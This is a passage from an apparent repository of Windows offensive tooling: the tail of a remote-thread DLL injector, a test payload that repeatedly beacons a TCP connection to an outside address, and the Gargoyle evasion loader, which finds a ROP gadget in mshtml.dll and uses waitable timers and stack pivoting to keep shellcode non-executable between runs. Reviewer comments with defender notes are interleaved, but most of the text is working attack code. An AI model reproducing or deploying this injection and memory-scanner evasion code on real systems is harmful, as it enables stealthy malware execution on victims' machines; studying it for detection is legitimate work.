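					bufferStillInUse = TRUE; // the remote thread may still read the path
				}
				else
				{
					DWORD exitCode = 0;
					if (GetExitCodeThread(hRemoteThread, &exitCode) && exitCode != 0)
					{
						result = TRUE;
					}
					else
					{
						cout << "LoadLibraryA failed in the target (does the DLL path exist there?)" << endl;
					}
				}
				CloseHandle(hRemoteThread);
			}
		}
	}

	// The path buffer is only needed until LoadLibraryA has consumed it; the
	// original never released it.
	if (!bufferStillInUse)
	{
		VirtualFreeEx(injectionProcessHandle, AllocAddr, 0, MEM_RELEASE);
	}
	return result;
}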
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/CommonInjection/x64/Debug/CommonInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/CommonInjection/x64/Release/CommonInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.cpp:
--------------------------------------------------------------------------------
1 | // DLLTest.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "InjectionDLL.h"
6 | #include
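// Test harness: loads InjectionDLL.dll into *this* process through the normal
// loader (its DllMain runs here, with no cross-process injection involved) and
// then keeps the process alive so the DLL's behaviour can be observed.
// The DLL is found via the default LoadLibrary search order, so it must sit
// next to DLLTest.exe or on PATH.
// Returns 1 when the DLL cannot be loaded (GetLastError() holds the reason);
// otherwise never returns until the process is killed.
int main()
{
	//Ping();
	HMODULE H = LoadLibraryA("InjectionDLL.dll");
	if (H == NULL)
	{
		// The original spun forever even when nothing had been loaded.
		return 1;
	}

	//FARPROC ping = GetProcAddress(H, "Ping");
	// ping();

	// Block without burning a CPU core: the original `while (1);` busy-waited,
	// and a side-effect-free infinite loop is undefined behaviour in C++.
	Sleep(INFINITE);
	return 0;
}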
17 |
18 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {25F8D1B0-3C56-42EC-84AB-B4A01932DF51}
23 | Win32Proj
24 | DLLTest
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | Use
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Use
100 | Level3
101 | Disabled
102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
103 | true
104 |
105 |
106 | Console
107 | true
108 |
109 |
110 |
111 |
112 | Level3
113 | Use
114 | MaxSpeed
115 | true
116 | true
117 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 | D:\Users\sudo\Documents\visual studio 2015\Projects\ProcessInjection\Debug;%(AdditionalIncludeDirectories)
120 |
121 |
122 | Console
123 | true
124 | true
125 | true
126 | D:\Users\sudo\Documents\visual studio 2015\Projects\ProcessInjection\Debug
127 | InjectionDLL.lib;%(AdditionalDependencies)
128 |
129 |
130 |
131 |
132 | Level3
133 | Use
134 | MaxSpeed
135 | true
136 | true
137 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
138 | true
139 |
140 |
141 | Console
142 | true
143 | true
144 | true
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 | Create
159 | Create
160 | Create
161 | Create
162 |
163 |
164 |
165 |
166 |
167 |
--------------------------------------------------------------------------------
/DLLTest/DLLTest.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/DLLTest/Debug/DLLTest.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\dlltest.pch
2 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\vc140.pdb
3 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\vc140.idb
4 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\stdafx.obj
5 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\dlltest.obj
6 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.ilk
7 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.exe
8 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.pdb
9 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.obj
10 | d:\users\sudo\documents\github\processinjection\dlltest\debug\stdafx.obj
11 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.pch
12 | d:\users\sudo\documents\github\processinjection\dlltest\debug\vc140.idb
13 | d:\users\sudo\documents\github\processinjection\dlltest\debug\vc140.pdb
14 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.command.1.tlog
15 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.read.1.tlog
16 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.write.1.tlog
17 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.command.1.tlog
18 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.read.1.tlog
19 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.write.1.tlog
20 |
--------------------------------------------------------------------------------
/DLLTest/Debug/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/InjectionDLL.h:
--------------------------------------------------------------------------------
#ifndef InjectionDll_H_
#define InjectionDll_H_
// Export/import switch for the DLL's public functions.
// NOTE(review): the macro tested here (InjectionDLL) is the very macro defined
// two lines below, so unless a project defines InjectionDLL on the compiler
// command line the test is false in every translation unit and the DLL and its
// consumers alike get dllexport. The conventional pattern tests a separate,
// project-defined symbol (e.g. INJECTIONDLL_EXPORTS) so that the DLL gets
// dllexport and consumers dllimport; note the branches here are also the
// reverse of that convention. Left unchanged because InjectionDLL.cpp / .def
// (not visible here) may depend on the current behaviour - confirm before fixing.
#ifdef InjectionDLL
#define InjectionDLL extern "C" _declspec(dllimport)
#else
#define InjectionDLL extern "C" _declspec(dllexport)
#endif // InjectionDLL
// Exported test entry point implemented by InjectionDLL.dll.
InjectionDLL void Ping();
#endif // !InjectionDll_H_
10 |
11 |
--------------------------------------------------------------------------------
/DLLTest/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DLLTest Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DLLTest application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DLLTest application.
9 |
10 |
11 | DLLTest.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DLLTest.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DLLTest.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DLLTest.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/DLLTest/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DLLTest.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/DLLTest/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/DLLTest/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/DLLTest/x64/Debug/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/x64/Release/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/EXEPayload/Debug/EXEPayload.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/EXEPayload/EXEPayload.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}
23 | EXEPayload
24 | 8.1
25 |
26 |
27 |
28 | Application
29 | true
30 | v140
31 | MultiByte
32 |
33 |
34 | Application
35 | false
36 | v140
37 | true
38 | MultiByte
39 |
40 |
41 | Application
42 | true
43 | v140
44 | MultiByte
45 |
46 |
47 | Application
48 | false
49 | v140
50 | true
51 | MultiByte
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | Level3
75 | Disabled
76 | true
77 |
78 |
79 |
80 |
81 | Level3
82 | Disabled
83 | true
84 |
85 |
86 |
87 |
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 |
94 |
95 | true
96 | true
97 |
98 |
99 |
100 |
101 | Level3
102 | MaxSpeed
103 | true
104 | true
105 | true
106 |
107 |
108 | true
109 | true
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
--------------------------------------------------------------------------------
/EXEPayload/EXEPayload.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/EXEPayload/main.cpp:
--------------------------------------------------------------------------------
1 | #include "main.h"
// Entry point of the test payload that HollowingDropper/main.cpp points its
// lpSourceFile at (EXEPayload.exe). Shows a message box as a visible proof of
// execution, then loops forever calling TryConnect() every 5 s.
// It never returns, so the missing `return` statement is unreachable;
// hInstance/hPrevInstance/lpCmdLine/nCmdShow are unused.
// Defender note: the observable behaviour is the MessageBox plus a periodic
// outbound TCP attempt (see TryConnect below).
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MessageBoxA(NULL, "test", "tt", 0);
    while (1)
    {
        TryConnect();
        Sleep(5000); // 5 s between attempts
    }
}
11 |
12 |
// Best-effort connectivity beacon: opens a TCP socket, attempts one connect to
// 114.114.114.114:53 and immediately closes it. Nothing is sent or received.
// The results of socket() and connect() are deliberately ignored — a failed
// attempt is dropped silently and simply retried by the caller's loop.
// Defender note: an outbound TCP SYN to 114.114.114.114:53 every ~5 s from a
// process with no reason to speak DNS-over-TCP is the network indicator.
// This function is duplicated verbatim in InjectionDLL/InjectionDLL.cpp.
void TryConnect()
{
    WSADATA wsa;
    // Winsock 1.1 is requested; sufficient for a bare TCP connect.
    if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
    {
        return;
    }
    SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0); // may be INVALID_SOCKET; unchecked
    SOCKADDR_IN SocketSendIn; // sin_zero is left uninitialized; it is padding that connect() ignores
    SocketSendIn.sin_family = AF_INET;
    SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
    SocketSendIn.sin_port = htons(53);
    // sizeof(SOCKADDR) == sizeof(SOCKADDR_IN) (16 bytes), so the length is correct.
    connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
    closesocket(m_socket);
    WSACleanup();
}
29 |
--------------------------------------------------------------------------------
/EXEPayload/main.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib,"Ws2_32.lib")
5 | using namespace std;
6 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow);
7 | void TryConnect();
8 |
--------------------------------------------------------------------------------
/EXEPayload/x64/Debug/EXEPayload.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | using namespace std;
11 |
namespace {
    // Signature of the PIC entry point; setup.nasm documents itself as
    // "void (*__cdecl callable)(void* workspace)".
    typedef void(*callable)(void*);
    // NOTE(review): template arguments were lost in this rendering; the uses in
    // allocate_pic() and get_gadget() imply tuple<void*, size_t>.
    typedef tuple MyTuple;
    // Timer period handed to the PIC via config.interval (15 s).
    constexpr DWORD invocation_interval_ms = 15 * 1000;
    // Must equal `.stack: RESB 0x10000` in setup.nasm.
    constexpr size_t stack_size = 0x10000;

    // Byte patterns searched for in the executable sections of the donor DLL
    // (get_system_dll_gadget). The second entry is exactly what gadget.nasm
    // assembles to. NOTE(review): element type lost in rendering (byte vectors).
    vector> rop_gadget_candidates = {
        { 0x59, 0x5C, 0xC3 }, // pop ecx; pop esp; ret
        { 0x58, 0x5C, 0xC3 } // pop eax; pop esp; ret
    };

    // Binary contract with the position-independent code: field order and sizes
    // must match the leading fields of `STRUC Configuration` in setup.nasm, which
    // is written for BITS 32 with every pointer as RESD 1 (4 bytes). On an x64
    // build void* is 8 bytes and the two layouts no longer line up.
    struct SetupConfiguration {
        uint32_t initialized;          // 0 on first entry; the PIC sets it to 1
        void* setup_address;           // base of the setup.pic mapping
        uint32_t setup_length;
        void* VirtualProtectEx;        // API pointers the PIC calls through instead of importing
        void* WaitForSingleObjectEx;
        void* CreateWaitableTimer;
        void* SetWaitableTimer;
        void* MessageBox;
        void* tramp_addr;              // &Workspace::tramp
        void* sleep_handle;            // waitable timer handle, written by the PIC
        uint32_t interval;             // invocation_interval_ms
        void* target;                  // gadget address (`.gadget` in the nasm struct)
        uint8_t shadow[8];             // scratch the PIC passes as SetWaitableTimer due-time and VirtualProtectEx old-protect
    };

    // Laid out as a VirtualProtectEx call frame (return address + five
    // arguments) followed by the PIC's own state; the gadget's `ret` consumes
    // it as a real stack. Nine 4-byte slots == `.trampoline: RESD 9` in setup.nasm.
    struct StackTrampoline {
        void* VirtualProtectEx;        // slot popped by the gadget's ret; rewritten by the PIC on every run
        void* return_address;          // where VirtualProtectEx returns: the PIC itself
        void* current_process;         // hProcess
        void* address;                 // lpAddress: the PIC mapping
        uint32_t size;                 // dwSize
        uint32_t protections;          // flNewProtect (PAGE_EXECUTE_READ)
        void* old_protections_ptr;     // lpflOldProtect
        uint32_t old_protections;
        void* setup_config;            // argument the PIC reads from [esp+4]
    };

    // One zeroed RW allocation (allocate_workspace) holding everything the PIC
    // touches; the whole struct equals the nasm `Configuration` STRUC, whose
    // tail is the 0x10000-byte stack and the nine-dword trampoline.
    struct Workspace {
        SetupConfiguration config;
        uint8_t stack[stack_size];
        StackTrampoline tramp;
    };
}
57 |
// Allocates one zeroed, read/write Workspace in the current process and returns
// it by reference; the block is never freed (process lifetime). Throws
// runtime_error if VirtualAllocEx fails.
// NOTE(review): `"..." + GetLastError()` is pointer arithmetic on a string
// literal, not concatenation — the literal is offset by the error code, giving
// a truncated or garbage message (and an out-of-bounds read for large codes).
// Use `std::string("...") + to_string(GetLastError())`. The same pattern
// recurs in allocate_pic() and get_system_dll_gadget().
Workspace& allocate_workspace() {
    auto result = VirtualAllocEx(GetCurrentProcess(), nullptr, sizeof(Workspace), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!result) throw runtime_error("[-] Couldn't VirtualAllocEx: " + GetLastError());
    RtlSecureZeroMemory(result, sizeof(Workspace)); // config.initialized and sleep_handle must start at 0 for the PIC
    return *static_cast(result); // NOTE(review): template argument (Workspace*) lost in rendering
}
64 |
// Loads the raw blob at `filename` into a fresh allocation and returns
// {base, size}. The region is requested RWX, filled from the file, then
// flipped to PAGE_EXECUTE_READ — a private RWX→RX transition holding
// file-sourced code, which memory-integrity tooling commonly flags.
// Throws runtime_error when the file cannot be opened or VirtualAllocEx /
// VirtualProtectEx fails. NOTE(review): `"..." + GetLastError()` in those
// messages is pointer arithmetic on a literal, not concatenation.
// Unchecked: a short read (the read() result is not verified) and a
// zero-length file, for which VirtualAllocEx(..., 0, ...) fails.
MyTuple allocate_pic(const string& filename) {
    // `ate` opens positioned at the end so tellg() yields the file size.
    fstream file_stream{ filename, fstream::in | fstream::ate | fstream::binary };
    if (!file_stream) throw runtime_error("[-] Couldn't open \"" + filename + "\".");
    auto pic_size = static_cast(file_stream.tellg()); // NOTE(review): template argument (size_t) lost in rendering
    file_stream.seekg(0, fstream::beg);
    auto pic = VirtualAllocEx(GetCurrentProcess(), nullptr, pic_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pic) throw runtime_error("[-] Couldn't VirtualAllocEx: " + GetLastError());
    file_stream.read(static_cast(pic), pic_size); // NOTE(review): cast target (char*) lost in rendering
    file_stream.close();
    DWORD old_protection;
    // Drop write access once the blob is in place.
    auto prot_result = VirtualProtectEx(GetCurrentProcess(), pic, pic_size, PAGE_EXECUTE_READ, &old_protection);
    if (!prot_result) throw runtime_error("[-] Couldn't VirtualProtectEx: " + GetLastError());
    return MyTuple(pic, pic_size);
}
79 |
// Loads `system_dll_filename` into this process and scans its executable
// sections for any byte pattern in rop_gadget_candidates. Returns the address
// of the first match, or 0 (null) when none is found. Throws runtime_error if
// LoadLibraryA or ImageNtHeader fails.
// Defender note: borrowing the gadget from a legitimately mapped, signed DLL
// means the timer's completion routine points into trusted image memory; what
// remains visible is this process loading a DLL it otherwise never uses
// (main() passes mshtml.dll).
// Defects (logging/efficiency only; none change the scan result):
//  * `"..." + GetLastError()` is pointer arithmetic on a literal, not
//    concatenation — the messages are garbage.
//  * IMAGE_SECTION_HEADER::Name is 8 bytes and not NUL-terminated; `%s` can
//    over-read — use `%.8s`.
//  * The whole section is copied into `section_content` once per candidate
//    (inner loop); the copy is loop-invariant, and std::search could run over
//    the mapped bytes directly.
//  * `pe_header + 1` assumes the standard optional-header size;
//    IMAGE_FIRST_SECTION honours SizeOfOptionalHeader.
//  * `return 0;` for a pointer — prefer nullptr.
// NOTE(review): the cast and `vector` template arguments were lost in this
// rendering; the arithmetic on dll_base implies a byte pointer.
void* get_system_dll_gadget(const string& system_dll_filename) {
    printf("[ ] Loading \"%s\" system DLL.\n", system_dll_filename.c_str());
    auto dll_base = reinterpret_cast(LoadLibraryA(system_dll_filename.c_str()));
    if (!dll_base) throw runtime_error("[-] Couldn't LoadLibrary: " + GetLastError());

    printf("[+] Loaded \"%s\" at 0x%p.\n", system_dll_filename.c_str(), dll_base);

    // ImageNtHeader (DbgHelp.lib, linked in Gargoyle.vcxproj) locates the NT
    // headers of the mapped image.
    auto pe_header = ImageNtHeader(dll_base);
    if (!pe_header) throw runtime_error("[-] Couldn't ImageNtHeader: " + GetLastError());

    // Keep only sections marked executable.
    auto filtered_section_headers = vector();
    auto section_header = reinterpret_cast(pe_header + 1);
    for (int i = 0; i < pe_header->FileHeader.NumberOfSections; ++i)
    {
        if (section_header->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
            filtered_section_headers.push_back(section_header);
            printf("[ ] Found executable section \"%s\" at 0x%p.\n", section_header->Name, dll_base + section_header->VirtualAddress);
        }
        section_header++;
    };

    // First hit wins: sections in image order, candidates in declaration order.
    for (auto section_header : filtered_section_headers)
    {
        for (auto rop_gadget : rop_gadget_candidates)
        {
            auto section_base = dll_base + section_header->VirtualAddress;
            vector section_content(section_base, section_base + section_header->Misc.VirtualSize);
            auto search_result = search(begin(section_content), end(section_content), begin(rop_gadget), end(rop_gadget));
            if (search_result == end(section_content))
                continue;

            // Translate the offset in the copy back to the live mapping.
            auto rop_gadget_offset = section_base + (search_result - begin(section_content));
            printf("[+] Found ROP gadget in section \"%s\" at 0x%p.\n", section_header->Name, rop_gadget_offset);
            return rop_gadget_offset;
        }
    }

    printf("[-] Didn't find ROP gadget in \"%s\".\n", system_dll_filename.c_str());
    return 0;
}
120 |
// Resolves the gadget address the PIC installs as the timer completion
// routine. Tries the donor system DLL first when `use_system_dll` is set; if
// that is off, or the scan found nothing, maps `gadget_pic_path` as an
// executable region instead (allocate_pic). Exceptions from either helper
// propagate to the caller.
// `memory` is uninitialized on the `use_system_dll == false` path, but the
// `!use_system_dll ||` short-circuit means it is never read there; a
// `void* memory = nullptr;` initializer would make that obvious and quiet the
// compiler.
// NOTE(review): `%u` with a size_t argument is a format mismatch on 64-bit targets (`%zu`).
void* get_gadget(bool use_system_dll, const string& gadget_system_dll_filename, const string& gadget_pic_path) {
    void* memory;
    if (use_system_dll) {
        memory = get_system_dll_gadget(gadget_system_dll_filename);
    }
    if (!use_system_dll || !memory) {
        printf("[ ] Allocating executable memory for \"%s\".\n", gadget_pic_path.c_str());
        size_t size;
        tie(memory, size) = allocate_pic(gadget_pic_path);
        printf("[+] Allocated %u bytes for gadget PIC.\n", size);
    }
    return memory;
}
134 |
// Wires everything together and hands control to the PIC:
//  1. Maps `setup_pic_path` as RX (allocate_pic).
//  2. Picks a `pop ?; pop esp; ret` gadget — from the donor DLL, else `gadget_pic_path`.
//  3. Allocates the RW Workspace and fills the StackTrampoline so it reads as a
//     VirtualProtectEx call frame (re-protect the PIC as PAGE_EXECUTE_READ and
//     return into it) followed by the PIC's argument, &config.
//  4. Fills SetupConfiguration with the API pointers, timer interval, gadget
//     and trampoline addresses; config.initialized and config.sleep_handle stay
//     0 (zeroed by allocate_workspace) for the PIC to set.
//  5. Calls the PIC. As written in setup.nasm it pivots esp into the workspace
//     and ends in a never-returning wait chain ("Return address never ret'd"),
//     so this call does not come back and main()'s try block never completes.
// Defender note: after step 5 the PIC sits non-executable (PAGE_READONLY)
// inside an alertable wait most of the time; the durable artefacts are the
// waitable timer whose completion routine is `gadget_memory` and whose
// argument is `tramp`, and a thread whose esp lies in a VirtualAlloc'd
// region rather than its registered stack.
// NOTE(review): `%d`/`%u` are used with size_t (`%zu`); the cast template
// arguments (`uint32_t`, `callable`) were lost in this rendering.
void launch(const string& setup_pic_path, const string& gadget_system_dll_filename, const string& gadget_pic_path) {
    printf("[ ] Allocating executable memory for \"%s\".\n", setup_pic_path.c_str());
    void* setup_memory; size_t setup_size;
    tie(setup_memory, setup_size) = allocate_pic(setup_pic_path);
    printf("[+] Allocated %d bytes for PIC.\n", setup_size);

    auto use_system_dll{ true }; // donor DLL is always preferred; gadget.pic is only the fallback
    printf("[ ] Configuring ROP gadget.\n");
    auto gadget_memory = get_gadget(use_system_dll, gadget_system_dll_filename, gadget_pic_path);
    printf("[+] ROP gadget configured.\n");

    printf("[ ] Allocating read/write memory for config, stack, and trampoline.\n");
    auto& scratch_memory = allocate_workspace();
    auto& config = scratch_memory.config;
    auto& tramp = scratch_memory.tramp;
    printf("[+] Allocated %u bytes for scratch memory.\n", sizeof(scratch_memory));

    // Field order matters: the gadget's `ret` consumes this struct as a raw stack frame.
    printf("[ ] Building stack trampoline.\n");
    tramp.old_protections_ptr = &tramp.old_protections;
    tramp.protections = PAGE_EXECUTE_READ;
    tramp.current_process = GetCurrentProcess();
    tramp.VirtualProtectEx = VirtualProtectEx;
    tramp.size = static_cast(setup_size);
    tramp.address = setup_memory;
    tramp.return_address = setup_memory;
    tramp.setup_config = &config;
    printf("[+] Stack trampoline built.\n");

    printf("[ ] Building configuration.\n");
    config.setup_address = setup_memory;
    config.setup_length = static_cast(setup_size);
    config.VirtualProtectEx = VirtualProtectEx;
    config.WaitForSingleObjectEx = WaitForSingleObjectEx;
    config.CreateWaitableTimer = CreateWaitableTimerW; // W variant is fine: the PIC passes a null name (three zero pushes)
    config.SetWaitableTimer = SetWaitableTimer;
    config.MessageBox = MessageBoxA;
    config.tramp_addr = &tramp;
    config.interval = invocation_interval_ms;
    config.target = gadget_memory;
    printf("[+] Configuration built.\n");

    printf("[+] Success!\n");
    printf(" ================================\n");
    printf(" Gargoyle PIC @ -----> 0x%p\n", setup_memory);
    printf(" ROP gadget @ -------> 0x%p\n", gadget_memory);
    printf(" Configuration @ ----> 0x%p\n", &scratch_memory.config);
    printf(" Top of stack @ -----> 0x%p\n", &scratch_memory.stack);
    printf(" Bottom of stack @ --> 0x%p\n", &scratch_memory.stack[stack_size - 1]);
    printf(" Stack trampoline @ -> 0x%p\n", &scratch_memory.tramp);

    // cdecl call into the PIC with &config at [esp+4]; see note above on why it never returns.
    reinterpret_cast(setup_memory)(&config);
}
187 |
// Process entry: runs the demo with its fixed artefacts and reports any setup
// failure on stdout. Inputs are hard-coded: setup.pic and gadget.pic next to
// the executable, and mshtml.dll as the gadget donor.
int main() {
    const std::string setup_pic{ "setup.pic" };
    const std::string donor_dll{ "mshtml.dll" };
    const std::string gadget_pic{ "gadget.pic" };
    try {
        launch(setup_pic, donor_dll, gadget_pic);
    }
    catch (const std::exception& error) {
        printf("%s\n", error.what());
    }
    return 0;
}
196 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}
23 | Win32Proj
24 | Gargoyle
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | NotUsing
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | false
91 |
92 |
93 | Console
94 | true
95 | DbgHelp.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
96 |
97 |
98 |
99 |
100 | Use
101 | Level3
102 | Disabled
103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | false
105 |
106 |
107 | Console
108 | true
109 |
110 |
111 |
112 |
113 | Level3
114 | Use
115 | MaxSpeed
116 | true
117 | true
118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 | true
125 | true
126 |
127 |
128 |
129 |
